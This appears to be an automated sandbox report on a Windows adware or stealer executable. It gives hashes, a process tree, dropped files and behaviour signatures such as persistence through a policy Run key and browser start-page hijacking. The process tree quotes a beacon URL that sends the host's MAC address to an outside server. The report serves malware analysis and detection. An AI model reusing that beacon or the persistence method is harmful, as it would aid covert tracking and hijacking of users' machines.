Overview

overview

8

Static

static

3

09522872ca...18.exe

windows7-x64

8

09522872ca...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2024, 06:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    09522872ca211fbc4d687b6711ed4b99_JaffaCakes118.exe

  • Size

    40KB

  • MD5

    09522872ca211fbc4d687b6711ed4b99

  • SHA1

    7b84ee5a9887c32b3c56e7b7f60b23d8701a198d

  • SHA256

    1a127f0d1d420481c6c9e6553534584a19be125b6068a9d00dfa9548d9de0e84

  • SHA512

    375fa81e54892b21d9e60bc7d95ab5d9b611ad6ebc24b72f7b69acb7f846201bf297e27e004f085e31e84f403d689857e65474b42583bbebc5a8ab02cadc17ac

  • SSDEEP

    768:f88hfKIZWpmZTCjMA2Un/bMk8y95AvI2ezWgP5yMHp0GjbOpAu:f/AmhCj/2UH5IIrfHCKu

Score
8/10
discoverypersistence

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies Internet Explorer start page 1 TTPs 2 IoCs
    stealer
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\09522872ca211fbc4d687b6711ed4b99_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\09522872ca211fbc4d687b6711ed4b99_JaffaCakes118.exe"
    1⤵
    • Adds policy Run key to start application
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer start page
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\program files\internet explorer\iexplore.exe
      "C:\program files\internet explorer\iexplore.exe" "http://www.ieroc.cn/ok/install.asp?ver=090519&tgid=routie&address=6E-73-9D-7B-0B-BB&regk=1&flag=8679ad71c9cfd4f1ac0a215dc6552f1d&frandom=0&alreg=0"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1832
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1832 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2660
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1832 CREDAT:1324039 /prefetch:2
        3⤵
          PID:2040

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      9cf8cf6d54af91d11b45788e5f53caf9

      SHA1

      4b5a63c0bdad02a2bc28b77c81dc3369d4653e7d

      SHA256

      c320da14a6d2e05642e8aeb5400c439e2654b54e3a5ed70b2ad3cacec141a837

      SHA512

      ec319a83e528c532df5749fa33dd59653e3c1abf77bdd5ad98bff207d415da4f11976107cc5b5c9e9a6bcfb6acefba3d15ee4badd2949a1089c1d040ff3512e1

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      14dd1f55535cb5027470c0f9d58965b9

      SHA1

      c4dbecbff16e42379a95acaa2c7d9b2da34602eb

      SHA256

      81d0c3017496bc6d981d91918ebcc6d3ec000ab69f09495d5c2c530f5ab73c09

      SHA512

      accdef5d201498f3d9d5d5ebecc398f5377d1ad3d8e1dd64ed4e7876e08eb89bbffc35d596389e7afb79087b10aa214c690d7f2a28fd2f073b7926abcb81c99b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      4d091a4e546f575ab3fe48f4ad52e814

      SHA1

      a4874c5a21321c91213ef261175190018bec6f83

      SHA256

      0fa952dd644a9746f6e91d2e6560ca4e89abe0579746e883ac90d3c16fc8d029

      SHA512

      22b259b855b3312935b5340f5aba859a6fef14cae1248b8823960a9ee97aa4dd170a759f8a983f613ca33556674c699e46de02b225de08b71302b74dcd4092f5

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      50c10b5d0a8837ce5ce42df60a9c1539

      SHA1

      372ac5d15210289d4083755ad941140774edc350

      SHA256

      4699093dcd4708f2dca874704c1f285c05e59e85eb0f5df317fdc91b4eaecd8f

      SHA512

      dc5f515ee067189553d8b6962b8a2615a945f43aacdd3f6eeb129af259b4b2e79bf84a7eae7f7b7dc92faed27cd4bc2110022de04a9bb760f4b45705189f9c40

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      71b3b42084fc5e34e54dcd8b28257aef

      SHA1

      24b5f26eafa7dca11ebc8660270a69fa89750d1b

      SHA256

      2bc2dbcac513aaaf74fc7b47860291bd4b04c274b1cb63dca62827541c3fc9cf

      SHA512

      b29d4bfb3b3792c4d344e9af76e2525721a1c4a72b9948b6efc591dd00e6145acc300317d6a30f06849c8da29e1cecc793c5f89bab426d4be771e8913fe0d086

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      710df8e6685ff739e88d3283edc305cd

      SHA1

      ea536e95666ff78fcdf54adbf30cb19e04a9f61a

      SHA256

      297cb14924736e78c38c600df1ccf698a6305223bd3e4fe1aeab4db4f10a82b4

      SHA512

      a1736ad25aff96692a34c8a5734d78d5b093ece1cc2781802d18c8d3fae62a19da8bcbb8a2c62aa3177c7f54dd112ffe58a611b8fe77060b6cdf82917c0e8ccf

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      6414bcabc2a3ee45e65cadb32bdc118b

      SHA1

      8f2340e359af94d1450d46d59e24da6315673605

      SHA256

      b82de3c5434c0f76835c87dc415ff49cff737da0950832e5a07986f2dd567e10

      SHA512

      e5632378c356f985c7ccae32391c3ee9cdf0171fbc00955ece05132e604129791ba4be0745be51e79a733db73c001de720e93e9c04903ce849b2422b5ce567ca

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      310c006bd84153f7d1737015ce8a5415

      SHA1

      34dc665f289651b3e544a21d8f8ee40b7c2893a6

      SHA256

      141659470dad8157ea25f7b3bcbee4dd58a9fb75ed5f043c4882644b44cd5bdf

      SHA512

      7d890bbda27395b80ae3c9eb764380a52653275201bcafe5a315cee2385c360c8b182fe92e176660e42c1057ca69737d111d7ce0c50528ced99632b056ba9c0b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      9500c43cb7096138b79806c25a387187

      SHA1

      9b36092aabce9b474f5d65b26640823940068b7d

      SHA256

      52b1ffe60b8fece0112fcae1e8990915dac4db0f08812054c4e9fc31d6a6af40

      SHA512

      db5c89a7df910f2a45f586d360a89365c3ab311842271cb8c62511446f427ce0519164bb04123b7457f26e2cd993ac51e8e80ba1dcc2cbeca490c8d2601522f3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabFC3D.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarFCCC.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\~DF8346B478084A6369.TMP
      Filesize

      16KB

      MD5

      eeb1ae4f2c5ec0a3d19e8d78cf2b63cf

      SHA1

      8534328b6ec332db070f9bf2a238784d10f0932c

      SHA256

      4f4a364af83e290e5968b4b0c5b92d179d483d8bdc6fc6b0d7c03e27f81a321e

      SHA512

      49352a85b253b7eec3fbbdc32aaa503f418feed88b45fe57e7090e6a9ba3a97a4d73e99c42468a25f872d5b1ba7aa95c9b877892b59609deb08bcc9b0ea1c767

      Download Submit

    • C:\Users\Admin\Favorites\2298ÍøÖ·µ¼º½,°²È«,ÂÌÉ«,¿ìËÙ.url
      Filesize

      116B

      MD5

      81c838fedad0ead4fd1d99d90748bca8

      SHA1

      a790d66680ae2530f062583d6027db1961c43879

      SHA256

      bfe2da7b2e0199b88bfaaefe19cff9b92182b2f9e0a480d07266a7ff1e10f690

      SHA512

      9f1a756cd0f39432d1bcf07f6207f8c19821eff2e0bddfc7b7f878c9ca340cf3923921b8019ae7defc9bfb50cb3fac6aff546198826a0c77acbb03381509f2db

      Download Submit

    • memory/2476-26-0x0000000000400000-0x0000000000411000-memory.dmp

      Filesize

      68KB

      Download

    • memory/2476-466-0x0000000000400000-0x0000000000411000-memory.dmp

      Filesize

      68KB

      Download